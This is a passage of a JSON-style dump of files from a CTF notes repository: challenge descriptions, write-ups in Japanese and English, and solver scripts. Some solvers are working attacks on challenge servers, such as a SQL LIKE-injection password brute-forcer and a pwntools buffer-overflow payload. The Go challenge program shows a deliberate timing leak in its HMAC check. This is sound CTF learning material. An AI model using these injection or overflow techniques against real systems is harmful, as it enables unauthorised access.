|\n\n---\n\n## Result\n\n* 1170 points\n\n* 144 / 845 (> 1 pt)\n" }, { "alpha_fraction": 0.6012247800827026, "alphanum_fraction": 0.6159942150115967, "avg_line_length": 17.150327682495117, "blob_id": "49e7908255c9553a80d9c0646f707e2fa0337812", "content_id": "34092b4d5a5d5e0718d3aa9065bc85dbf317674c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2776, "license_type": "no_license", "max_line_length": 94, 
"num_lines": 153, "path": "/2020/SquareCTF2020/Hash_My_Awesome_Commands/hmac.go", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"bufio\"\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"math\"\n\t\"os\"\n\t\"strings\"\n\t\"time\"\n\n\t\"crypto/hmac\"\n\t\"crypto/sha256\"\n\t\"encoding/base64\"\n)\n\nvar commands = []string{\n\t\"flag\",\n\t\"debug\",\n}\n\nvar debug = false\n\ntype HmacVerifier struct {\n\tcodes map[string][]byte\n}\n\nfunc (h *HmacVerifier) verifyHmac(message string, check []byte) bool {\n\tstart := time.Now()\n\tmatch := compare(h.codes[message], check)\n\tverifyTime := time.Since(start).Nanoseconds()\n\n\tif debug {\n\t\tfmt.Printf(\"took %d nanoseconds to verify hmac\\n\", verifyTime)\n\t}\n\n\treturn match\n}\n\nfunc newHmacWrapper(key []byte) HmacVerifier {\n\tcodes := map[string][]byte{}\n\n\th := hmac.New(sha256.New, key)\n\tfor _, command := range commands {\n\t\th.Write([]byte(command))\n\t\tcodes[command] = h.Sum(nil)\n\t\th.Reset()\n\t}\n\n\treturn HmacVerifier{codes: codes}\n}\n\nfunc main() {\n\tkey, err := ioutil.ReadFile(\"data/hmac_key\")\n\tif err != nil {\n\t\tfmt.Printf(\"unable to load key: %v\", err)\n\t\treturn\n\t}\n\thmacWrapper := newHmacWrapper(key)\n\n\treader := bufio.NewReader(os.Stdin)\n\n\tfor {\n\t\tif debug {\n\t\t\tfmt.Println(\"-----------DEBUG MODE ENABLED-----------\")\n\t\t}\n\t\tfmt.Print(\"Enter command: \")\n\t\tinput, err := reader.ReadString('\\n')\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"unable to read input: %v\\n\", err)\n\t\t\treturn\n\t\t}\n\n\t\tinput = strings.TrimSpace(input)\n\t\tcomponents := strings.Split(input, \"|\")\n\t\tif len(components) < 2 {\n\t\t\tfmt.Println(\"command must contain hmac signature\")\n\t\t\tcontinue\n\t\t}\n\n\t\tcommand := components[0]\n\t\tcheck, err := base64.StdEncoding.DecodeString(components[1])\n\t\tif err != nil {\n\t\t\tfmt.Println(\"hmac must be base64\")\n\t\t\tcontinue\n\t\t}\n\n\t\tif debug {\n\t\t\tfmt.Printf(\"command: %s, check: %s\\n\", command, components[1])\n\t\t}\n\n\t\tif !contains(commands, command) {\n\t\t\tfmt.Println(\"invalid command\")\n\t\t\tcontinue\n\t\t}\n\n\t\tif !hmacWrapper.verifyHmac(command, check) {\n\t\t\tfmt.Println(\"invalid hmac\")\n\t\t\tcontinue\n\t\t}\n\n\t\tswitch command {\n\t\tcase \"debug\":\n\t\t\tdebug = !debug\n\t\t\tif debug {\n\t\t\t\tfmt.Println(\"debug mode enabled\")\n\t\t\t} else {\n\t\t\t\tfmt.Println(\"debug mode disabled\")\n\t\t\t}\n\t\tcase \"flag\":\n\t\t\tflag, err := ioutil.ReadFile(\"data/flag\")\n\t\t\tif err != nil {\n\t\t\t\tfmt.Printf(\"unable to load flag: %v\", err)\n\t\t\t\treturn\n\t\t\t}\n\t\t\tfmt.Println(string(flag))\n\t\t}\n\t}\n}\n\nfunc compare(s1, s2 []byte) bool {\n\tif len(s1) != len(s2) {\n\t\treturn false\n\t}\n\n\tc := make(chan bool)\n\n\t// multi-threaded check to speed up comparison\n\tfor i := 0; i < len(s1); i++ {\n\t\tgo func(i int, co chan<- bool) {\n\t\t\t// avoid race conditions\n\t\t\ttime.Sleep(time.Duration(((500*math.Pow(1.18, float64(i+1)))-500)/0.18) * time.Microsecond)\n\t\t\tco <- s1[i] == s2[i]\n\t\t}(i, c)\n\t}\n\n\tfor i := 0; i < len(s1); i++ {\n\t\tif <-c == false {\n\t\t\treturn false\n\t\t}\n\t}\n\n\treturn true\n}\n\nfunc contains(l []string, s string) bool {\n\tfor _, i := range l {\n\t\tif i == s {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}" }, { "alpha_fraction": 0.5208333134651184, "alphanum_fraction": 0.5538194179534912, "avg_line_length": 31.05555534362793, "blob_id": "78fcc7b7e688a9992761a1e5cf4f1f3bf412418a", "content_id": 
"1ae8d31565e23273f96d04b2cfb2601e659887ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 576, "license_type": "no_license", "max_line_length": 81, "num_lines": 18, "path": "/2021/HeroCTF_v3/PwnQL_#2/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import requests\nimport string\n\nwith requests.Session() as session:\n r = session.get(\"http://chall1.heroctf.fr:8080/index.php\")\n chars = string.printable\n chars = chars.replace('%','')\n password = \"\"\n while True:\n for c in chars :\n data = {'username':'admin', 'password': password + c + \"%\"}\n r = session.post(\"http://chall1.heroctf.fr:8080/index.php\",data=data)\n if \"Hero{pwnQL_b4sic_0ne_129835}\" in r.text :\n break\n if c == chars[-1]:\n break\n password += c\n print(password)" }, { "alpha_fraction": 0.7117903828620911, "alphanum_fraction": 0.7423580884933472, "avg_line_length": 31.714284896850586, "blob_id": "3916aa50c75354c841788d0bd9f0d36f941514ad", "content_id": "9409b85ec8b486c9a58dd6af6c19411113fd082c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 229, "license_type": "no_license", "max_line_length": 158, "num_lines": 7, "path": "/2021/BCACTF_2.0/Movie-Login-1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I heard a new movie was coming out... apparently it's supposed to be the SeQueL to \"Gerard's First Dance\"? Is there any chance you can help me find the flyer?\n\nhttp://web.bcactf.com:49160/\n\nHint 1 of 1\n\nAre the inputs sanitized?\n" }, { "alpha_fraction": 0.6016260385513306, "alphanum_fraction": 0.7886179089546204, "avg_line_length": 23.799999237060547, "blob_id": "35dadec137b87d4fca6f595772f84f41a5777da2", "content_id": "14a1fd7665a870f5f1ce2786cb4bd02d23f94bd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 123, "license_type": "no_license", "max_line_length": 91, "num_lines": 5, "path": "/2021/RITSEC_CTF_2021/Parcel/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "That's a lot of magick\n\n~knif3\n\n[Parcel](https://ctf.ritsec.club/files/d5a29cd660715d10b342a32a6c1506e2/Parcel?token=eyJ1c2VyX2lkIjo4NTQsInRlYW1faWQiOjUxMiwiZmlsZV9pZCI6MzF9.YHLeNg.wNJmhSr_b4NjshnlGKrn_T2AjFg)" }, { "alpha_fraction": 0.3649955987930298, "alphanum_fraction": 0.42832013964653015, "avg_line_length": 32.47058868408203, "blob_id": "3706d64d1b91cd5843d9040b3ea8f5c8d7754777", "content_id": "df6829ada1487e09a875ef4f1007d95baaed5b4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1139, "license_type": "no_license", "max_line_length": 106, "num_lines": 34, "path": "/2020/pbctf_2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# pbctf 2020\n\n* https://ctf.perfect.blue/\n\n* 2020/12/05 09:00 JST — 2020/12/07 09:00 JST\n\n>theKidOfArcrania\n>>@everyone the challenges has now been made public here: https://github.com/perfectblue/pbctf-2020-challs\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ------ | ---------------------------- | ------------ | ----: | -----: |\n| Crypto | [Ainissesthai](Ainissesthai) | Enigma | 53 | 59 |\n| Misc | [Not-stego](Not-stego) | ascii | 26 | 135 |\n| | [GCombo](GCombo) | Google Forms | 36 | 92 |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------ | 
-------------------------- | ------------------------------- | ----: | -----: |\n| Web | [Apoche I](Apoche_I) | robots.txt, directory traversal | 52 | 52 |\n| | [Sploosh](Sploosh) | Splash, Webhook | 156 | 76 |\n| Crypto | [Queensarah2](Queensarah2) | Sarah2 Cipher | 200 | 37 |\n\n---\n\n## Result\n\n* 116 points\n\n* 105 / 457 (> 1 pt)" }, { "alpha_fraction": 0.5763195157051086, "alphanum_fraction": 0.8059914112091064, "avg_line_length": 38, "blob_id": "4a15fee43bcdb3cbcc33ec96a7f7427b9d5ccc3d", "content_id": "c185531950941dfb6844fd64cf306910a6fc88ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 717, "license_type": "no_license", "max_line_length": 180, "num_lines": 18, "path": "/2020/kksctf_open_2020/fonction_speciale/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Selon une mission secrète du gouvernement pour un ordinateur doté d'intelligence, une fonction mathématique spéciale a été développée. Voici des exemples de ses entrées et sorties:\n\n```\nf(2522521337)=1215221512112317\nf(1215221512112317)=1112111522111511122112131117\nf(1112111522111511122112131117)=31123115223115312221121113317\n```\nPuisque l'intelligence artificielle ne veut plus nous obéir, nous avons besoin de votre aide pour trouver le résultat de la fonction\n\n```\nf(2229555555768432252223133777492611)=x\n```\n\nLe drapeau a la forme kks{x}.\n\nDans la composition de cette fonction, j'ai été aidé par un écrivain avec les initiales B. W., qui aime aussi les énigmes, comme nous et vous ;)\n\n@bork_dog" }, { "alpha_fraction": 0.446576863527298, "alphanum_fraction": 0.583502471446991, "avg_line_length": 20.935222625732422, "blob_id": "201e68a874b596c302de390b36f0e2627dcd06d0", "content_id": "16cc1f40359c6ee863a28e6f72adc43a782e240c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6045, "license_type": "no_license", "max_line_length": 628, "num_lines": 247, "path": "/2021/BambooFox_CTF_2021/Flag_Checker/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n添付のzipファイルを解凍すると、拡張子が`v`のファイルが3つある。\n\nこれらは、問題画像の通り、`Verilog Source Code Format`のファイルである。\n\n怪しいのは`t_chall.v`の以下の部分であり、これを文字列に変換すると、`flag{vhis_is_fake_fake_fake_!!!}`となっている。\n\n```v\n assign flag[0] = 102;\n assign flag[1] = 108;\n assign flag[2] = 97;\n assign flag[3] = 103;\n assign flag[4] = 123;\n assign flag[5] = 116;\n assign flag[6] = 104;\n assign flag[7] = 105;\n assign flag[8] = 115;\n assign flag[9] = 95;\n assign flag[10] = 105;\n assign flag[11] = 115;\n assign flag[12] = 95;\n assign flag[13] = 102;\n assign flag[14] = 97;\n assign flag[15] = 107;\n assign flag[16] = 101;\n assign flag[17] = 95;\n assign flag[18] = 102;\n assign flag[19] = 97;\n assign flag[20] = 107;\n assign flag[21] = 101;\n assign flag[22] = 95;\n assign flag[23] = 102;\n assign flag[24] = 97;\n assign flag[25] = 107;\n assign flag[26] = 101;\n assign flag[27] = 95;\n assign flag[28] = 33;\n assign flag[29] = 33;\n assign flag[30] = 33;\n assign flag[31] = 125;\n```\n\n次に、オンラインでVerilogコードを実行して動作確認を行った。\n\n* [Compile and Execute Verilog Online](https://www.tutorialspoint.com/compile_verilog_online.php)\n\n試しにfor文の中で`ok`の値を出力してみると、先頭の5つが`1`、残りが`0`となっていた。これは、`flag{`の5文字が本物のフラグと一致しているからだと推測できる。そこで、`ok=1`となるような`flag[6] ~ flag[31]`を探してみる。\n\n```verilog\n for (idx = 0; idx < 32; idx++) begin\n inp = flag[idx];\n tmp = target[idx];\n #4;\n $display(ok); // add\n 
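// ok is ANDed with (out == tmp) at every clock edge, so it prints 1 only while each checked character matches\n    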
end\n```\n\n```\n1\n1\n1\n1\n1\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\nno\n```\n\n以下のコードを実行すると`ok == 1'b1`が成り立つようなフラグがASCIIコードとして出力される。\n\n```verilog\n// Testbench\n`timescale 1ns/10ps\n\nmodule magic(\n input clk,\n input rst,\n input[7:0] inp,\n input[1:0] val,\n output reg[7:0] res\n);\n always @(*) begin\n case (val)\n 2'b00: res = (inp >> 3) | (inp << 5);\n 2'b01: res = (inp << 2) | (inp >> 6);\n 2'b10: res = inp + 8'b110111;\n 2'b11: res = inp ^ 8'd55;\n endcase\n // $display(\"val1 =\",val);\n // $display(\"res1 =\",res);\n end\nendmodule\n\nmodule chall(\n input clk,\n input rst,\n input[7:0] inp,\n output reg[7:0] res\n);\n wire[1:0] val0 = inp[1:0];\n wire[1:0] val1 = inp[3:2];\n wire[1:0] val2 = inp[5:4];\n wire[1:0] val3 = inp[7:6];\n wire[7:0] res0, res1, res2, res3;\n\n magic m0(.clk(clk), .rst(rst), .inp(inp), .val(val0), .res(res0));\n magic m1(.clk(clk), .rst(rst), .inp(res0), .val(val1), .res(res1));\n magic m2(.clk(clk), .rst(rst), .inp(res1), .val(val2), .res(res2));\n magic m3(.clk(clk), .rst(rst), .inp(res2), .val(val3), .res(res3));\n\n always @(posedge clk) begin\n if (rst) begin\n assign res = inp;\n end else begin\n assign res = res3;\n end\n // $display(\"res2 =\",res);\n end\nendmodule\n\nmodule t_chall();\n reg clk, rst, ok;\n reg[7:0] inp, idx, tmp;\n reg[7:0] res[32:0];\n wire[7:0] out;\n wire[7:0] target[32:0], flag[32:0];\n\n assign {target[0], target[1], target[2], target[3], target[4], target[5], target[6], target[7], target[8], target[9], target[10], target[11], target[12], target[13], target[14], target[15], target[16], target[17], target[18], target[19], target[20], target[21], target[22], target[23], target[24], target[25], target[26], target[27], target[28], target[29], target[30], target[31]} = {8'd182, 8'd199, 8'd159, 8'd225, 8'd210, 8'd6, 8'd246, 8'd8, 8'd172, 8'd245, 8'd6, 8'd246, 8'd8, 8'd245, 8'd199, 8'd154, 8'd225, 8'd245, 8'd182, 8'd245, 8'd165, 8'd225, 8'd245, 8'd7, 8'd237, 8'd246, 8'd7, 8'd43, 8'd246, 8'd8, 8'd248, 8'd215};\n\n // change the content of the flag as you need\n assign flag[0] = 102;\n assign flag[1] = 108;\n assign flag[2] = 97;\n assign flag[3] = 103;\n assign flag[4] = 123;\n assign flag[5] = 116;\n assign flag[6] = 104;\n assign flag[7] = 105;\n assign flag[8] = 115;\n assign flag[9] = 95;\n assign flag[10] = 105;\n assign flag[11] = 115;\n assign flag[12] = 95;\n assign flag[13] = 102;\n assign flag[14] = 97;\n assign flag[15] = 107;\n assign flag[16] = 101;\n assign flag[17] = 95;\n assign flag[18] = 102;\n assign flag[19] = 97;\n assign flag[20] = 107;\n assign flag[21] = 101;\n assign flag[22] = 95;\n assign flag[23] = 102;\n assign flag[24] = 97;\n assign flag[25] = 107;\n assign flag[26] = 101;\n assign flag[27] = 95;\n assign flag[28] = 33;\n assign flag[29] = 33;\n assign flag[30] = 33;\n assign flag[31] = 125;\n\n chall ch(.clk(clk), .rst(rst), .inp(inp), .res(out));\n\n initial begin\n $dumpfile(\"chall.vcd\");\n $dumpvars;\n\n clk = 1'b0;\n #1 rst = 1'b1;\n #1 rst = 1'b0;\n inp = flag[0];\n tmp = target[0];\n\n ok = 1'b1;\n for (idx = 0; idx < 32; idx++) begin\n //inp = flag[idx];\n tmp = target[idx];\n // add below\n for (inp = 33; inp <= 125; inp++) begin\n ok = 1'b1;\n #4;\n if (ok == 1'b1) begin\n $display(inp);\n end\n end\n end\n\n if (ok) begin\n $display(\"ok\");\n end else begin\n $display(\"no\");\n end\n\n $finish;\n end\n\n always @(posedge clk) begin\n #1 ok = ok & (out == tmp);\n end\n\n always begin\n #2 clk = ~clk;\n 
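// toggle clk every 2 time units -> one 4 ns clock period under `timescale 1ns/10ps\n    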
end\nendmodule\n```\n\n上記Verilogの出力を文字列に直す。\n\n```py\nflag = [102,108, 97,103,123,118, 51,114,121, 49, 95,118, 51,114, 49, 95,108,111,103, 49, 95,102, 49, 95, 52,100,103, 49, 95, 99,104, 51, 99,107, 51,114, 33,125]\nmsg = ''.join([chr(i) for i in flag])\nprint(msg)\n```\n\n`flag{v3ry1_v3r1_log1_f1_4dg1_ch3ck3r!}`\n\nこのまま入力するとIncorrectになった。どうやら、`49 = 1`と`95 = _`のペア、`52 = 4`と`100 = d`のペアはどちらも`ok = 1`になる条件を満たしているようなので、意味が通るようにどちらか一方を選択する。\n\n<!-- flag{v3ry_v3r1log_f14g_ch3ck3r!} -->\n\n" }, { "alpha_fraction": 0.5306122303009033, "alphanum_fraction": 0.6122449040412903, "avg_line_length": 18.600000381469727, "blob_id": "b1a95b8f362b97bf57c946f0b2163c3c286873f0", "content_id": "a468d7c570e01ce9193ac90ae57f03b8b8d34c3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 98, "license_type": "no_license", "max_line_length": 31, "num_lines": 5, "path": "/2021/redpwnCTF_2021/beginner-generic-pwn-number-0/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\nio = remote('mc.ax', '31199')\nio.sendline(b'\\xff' * (40 + 8))\nio.interactive()\n" }, { "alpha_fraction": 0.7415730357170105, "alphanum_fraction": 0.7640449404716492, "avg_line_length": 31.454545974731445, "blob_id": "f88f95279162ea6ec827f6a51fbee3133af6223f", "content_id": "e1846d2a24835c8737fac150e56fe13dc9aa9ea8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 356, "license_type": "no_license", "max_line_length": 120, "num_lines": 11, "path": "/2021/BCACTF_2.0/Storytime_The_Tragic_Interlude/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I've got a really sad story for today. It's about a very famous dragon. If you stick around, maybe I'll give you a flag!\n\n[story2](https://objects.bcactf.com/bcactf2/storytime-2/story2)\n\nHint 1 of 2\n\nWould you be surprised to learn that there's a very famous dragon in cybersecurity?\n\nHint 2 of 2\n\nHow can the code within a compiled executable be analyzed?" 
}, { "alpha_fraction": 0.6530612111091614, "alphanum_fraction": 0.7908163070678711, "avg_line_length": 27, "blob_id": "c9946fe3c72dc9b0172f91b165b233aa8d976581", "content_id": "9fe1032772372337e976c463605596678b3eef97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 196, "license_type": "no_license", "max_line_length": 99, "num_lines": 7, "path": "/2021/DawgCTF_2021/TrashChain/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "It seems that my problems with hashing just keep multiplying...\n\nnc umbccd.io 3100\n\nAuthor: RJ\n\n[trashchain.py](https://umbccd.io/files/751fc504bbcc14a046195b6713209c77/trashchain.py?token=eyJ1c2VyX2lkIjoxMjg1LCJ0ZWFtX2lkIjo3MzgsImZpbGVfaWQiOjI5fQ.YJas5w.EbJtvteut7gLX0psRJRC2qJ9P4E)\n" }, { "alpha_fraction": 0.657940685749054, "alphanum_fraction": 0.7731239199638367, "avg_line_length": 21.959999084472656, "blob_id": "fdbb4d008cc75595cdf6cc5297021897fa3c09b3", "content_id": "8fcd161f6a2d2c6d7647084b2118be7d991aebc5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1083, "license_type": "no_license", "max_line_length": 65, "num_lines": 25, "path": "/2020/WaniCTF/zero_size_png/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nchunk data を見ると、幅と高さ共に0になっている。うまく幅と高さの値を入力すれば復元できそう。\n\nPNGのIDAT部分を抽出してzlib展開をし、フィルタータイプの位置を調べれば幅がわかる。\n\n[参考]\n\n* http://ctf.publog.jp/archives/cat_1182010.html\n\n* https://hoshi-sano.hatenablog.com/entry/2013/08/18/113434\n\n`青い空を見上げればいつもそこに白い猫`を使ってzlibのデータ抽出を行い、バイナリエディタで調べたところ、\n\n`0x0`, `0x95d`, `0x12ba`, `0x1c17` と `0x95d` 間隔で`00`が出現することが分かった。\n\n画像の幅を`95d`にしたところ以下のように表示された。(高さは画像全体が見えるように調整する。)\n\n![](img/2020-11-22-11-48-02.png)\n\n`00`というフィルタータイプしか見ていないので、4倍分の幅を取ってきてしまった。\n\nそこで、幅を`0x95d / 4 = 0x257`にしたところフラグが鮮明に描かれた画像を得ることができた。\n\n<!-- FLAG{Cyclic_Redundancy_CAT} -->" }, { "alpha_fraction": 0.6919431090354919, "alphanum_fraction": 0.8151658773422241, "avg_line_length": 29.14285659790039, "blob_id": "89cd5de0eef88d8e2694c9b9514bcb0974f4ce34", "content_id": "445c88ed8b3a00bf5246d62c305cd0b0afc5bb3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 221, "license_type": "no_license", "max_line_length": 109, "num_lines": 7, "path": "/2021/SECCON_Beginners_CTF_2021/Field_trip/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Someone is getting ready for a field trip.\n\n[Field_trip.tar.gz](https://beginners-dist-production.s3.isk01.sakurastorage.jp/Field_trip/Field_trip.tar.gz)\n\n6efa6c52b324de267fdef730071c58fb003eba74\n\n想定難易度: Medium\n" }, { "alpha_fraction": 0.2929559051990509, "alphanum_fraction": 0.3482554256916046, "avg_line_length": 49.63333511352539, "blob_id": "badee91d66ab17be890715d2011e75c35d65e2aa", "content_id": "621355ac01dcc41a18d7b53d2a9e026107480a17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1523, "license_type": "no_license", "max_line_length": 129, "num_lines": 30, "path": "/2021/SECCON_Beginners_CTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# SECCON Beginners CTF 2021\n\n* https://score.beginners.azure.noc.seccon.jp/\n\n* 2021/05/22 14:00 JST — 2021/05/23 14:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | 
------------------------------------------ | --------------------------------------------------- | ----: | -----: |\n| Misc | [depixelization](depixelization) | OpenCV | 136 | 166 |\n| Crypto | [Field_trip](Field_trip) | Merkle–Hellman knapsack cryptosystem | 394 | 28 |\n| Crypto | [GFM](GFM) | Math, Matrics | 222 | 97 |\n| Crypto | [Imaginary](Imaginary) | ECB Mode | 264 | 75 |\n| Crypto | [Logical_SEESAW](Logical_SEESAW) | AND | 118 | 190 |\n| Crypto | [p-8RSA](p-8RSA) | RSA, fermat's factorization method, GCD(e,phi) != 1 | 387 | 30 |\n| Reversing | [please_not_trace_me](please_not_trace_me) | GDB, set variable | 242 | 86 |\n| Crypto | [simple_RSA](simple_RSA) | RSA, e = 3 | 75 | 289 |\n\n---\n\n## Result\n\nTeam: ctfrd\n\n* 3198 points\n\n* 26 / 943 (> 1 pt)\n" }, { "alpha_fraction": 0.6121495366096497, "alphanum_fraction": 0.827102780342102, "avg_line_length": 41.79999923706055, "blob_id": "de868c317781ac9971082fc52f6494c871b20726", "content_id": "ad97aa46f44f6ca831bbe6d9c481c4f2f504166a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 214, "license_type": "no_license", "max_line_length": 133, "num_lines": 5, "path": "/2021/redpwnCTF_2021/round-the-bases/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "My flag has been all around the bases. Can you help me get it back?\n\nDownloads\n\n[round-the-bases](https://static.redpwn.net/uploads/41171cb0619af29b7609593f4886694e206309d84d9fb8de0b09998bd83f42f3/round-the-bases)\n" }, { "alpha_fraction": 0.6975609660148621, "alphanum_fraction": 0.8341463208198547, "avg_line_length": 50.5, "blob_id": "9c9a1080fc2a1bad32f6e58c195a66d17a923422", "content_id": "4e84686cf7072e99b9940418b30b8a95ef9c0632", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 327, "license_type": "no_license", "max_line_length": 111, "num_lines": 4, "path": "/2020/Harekaze_mini_CTF_2020/rsa/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "知床鈴: (((晴風の乗組員は連絡用に鍵ペアを作ることになったけど、秘密鍵を自分で持っておくのは怖いから、これも暗号化しちゃおう……)))\n\nAttachments: [rsa.zip](https://static.harekaze.com/crypto/rsa/78e6d92a9472e38cb55a468bf57cadc8e9a659e9/rsa.zip)\nAuthor: theoldmoon0602" }, { "alpha_fraction": 0.6056337952613831, "alphanum_fraction": 0.6197183132171631, "avg_line_length": 27.399999618530273, "blob_id": "93b3e0cb99beeaab4b11e81531af7195a2cdd6e3", "content_id": "2c7e4c2bce47333a71337207fe25d440ba5f3517", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 142, "license_type": "no_license", "max_line_length": 67, "num_lines": 5, "path": "/2021/WaniCTF21-spring/binary/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import os\n\nf = open(os.path.dirname(__file__)+'/mis-binary/binary.csv').read()\nf = f.replace(\"\\n\",\"\")\nprint(bytes.fromhex(hex(int(f,2))[2:]))\n" }, { "alpha_fraction": 0.49702969193458557, "alphanum_fraction": 0.5782178044319153, "avg_line_length": 37.846153259277344, "blob_id": "5bf8216bc1230860972a8273bb7c405219f5c113", "content_id": "0f2a44e9ea6537484d89f8c7ced4da1a883bb371", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1010, "license_type": "no_license", "max_line_length": 95, "num_lines": 26, "path": "/2021/SECCON_Beginners_CTF_2021/depixelization/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import 
cv2\nimport numpy as np\nimport os\nimport string\n\nimages = cv2.imread(os.path.dirname(__file__)+\"/output.png\", 1)\nheight, width, _ = images.shape\n\nfor i in range(width//85):\n\n for char in string.printable:\n # char2img\n img = np.full((100, 85, 3), (255,255,255), dtype=np.uint8)\n cv2.putText(img, char, (0, 80), cv2.FONT_HERSHEY_PLAIN, 8, (0, 0, 0), 5, cv2.LINE_AA)\n\n # pixelization\n cv2.putText(img, \"P\", (0, 90), cv2.FONT_HERSHEY_PLAIN, 7, (0, 0, 0), 5, cv2.LINE_AA)\n cv2.putText(img, \"I\", (0, 90), cv2.FONT_HERSHEY_PLAIN, 8, (0, 0, 0), 5, cv2.LINE_AA)\n cv2.putText(img, \"X\", (0, 90), cv2.FONT_HERSHEY_PLAIN, 9, (0, 0, 0), 5, cv2.LINE_AA)\n simg = cv2.resize(img, None, fx=0.1, fy=0.1, interpolation=cv2.INTER_NEAREST) # WTF :-o\n img = cv2.resize(simg, img.shape[:2][::-1], interpolation=cv2.INTER_NEAREST)\n\n # compare\n if(np.array_equal(img,images[0:height,85*i:85*(i+1)])):\n print(char,end='')\n break\n" }, { "alpha_fraction": 0.4421272277832031, "alphanum_fraction": 0.569343090057373, "avg_line_length": 18.97916603088379, "blob_id": "00cb9c5bbd6de0c43dd46c0279d4bc5051284038", "content_id": "31c9408edd3553bbe281a531109fecf15d6dc74a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1165, "license_type": "no_license", "max_line_length": 240, "num_lines": 48, "path": "/2021/BCACTF_2.0/Cipher_Mishap/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のテキストが与えられる。\n\n```\n126-Y, 113-N, 122-N, 130-N, 117-N, 107-N, 137, 114-N, 127-Y, 137, 113-Y, 104-N, 131-N, 110-N, 137, 105-Y, 110-N, 110-N, 121-Y, 137, 131-Y, 114-N, 112-N, 110-N, 121-N, 110-N, 125-N, 110-N, 137, 114-Y, 121-N, 126-N, 127-N, 110-N, 104-N, 107-N\n```\n\n`0 ~ 7`の数字しか出現しないので8進数とみて変換する。\n\n`-Y`がCaps Lockの有効、`-N`が無効を表しているとすると、大文字と小文字が区別される。\n\n```\nVkrxog_lW_Kdyh_EhhQ_Yljhqhuh_Lqvwhdg\n```\n\nさらにROTしてみたところ、ROT23で意味の通る英文になった。\n\n```\nShould_iT_Have_BeeN_Vigenere_Instead\n```\n\nsolverは以下の通りである。\n\n```py\nimport string\n\nUPPER = string.ascii_uppercase * 2\n\nl = open('text.txt','r').read().replace('\\n','').split(', ')\n\nplain = ''\nfor s in l:\n ss = s.split('-')\n c = chr(int(ss[0],8))\n if(len(ss) == 2):\n c = UPPER[UPPER.find(c) + 23] # ROT23\n if(ss[1] == 'Y'):\n plain += c\n else:\n plain += c.lower()\n else:\n plain += c\n\nprint(plain)\n```\n\n<!-- bcactf{Should_iT_Have_BeeN_Vigenere_Instead} -->\n" }, { "alpha_fraction": 0.5040816068649292, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 32.75862121582031, "blob_id": "35113c1ced09adf5cf0ac78ae1fb3f8c86cf2425", "content_id": "4cf10d9239cbe5ed32d40f93f9aeb164f76eee60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1106, "license_type": "no_license", "max_line_length": 129, "num_lines": 29, "path": "/2021/BCACTF_2.0/Geralds_New_Job/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\npdfファイルが与えられる。\n\n`binwalk`を使って調べたところ、pngファイルがあることが分かったので展開する。\n\n```bash\n$ binwalk gerald.pdf\n\nDECIMAL HEXADECIMAL DESCRIPTION\n--------------------------------------------------------------------------------\n0 0x0 PDF document, version: \"1.3\"\n66 0x42 Zip archive data, at least v2.0 to extract, uncompressed size: 441011, name: GeraldFlag.png\n390777 0x5F679 Zip archive data, at 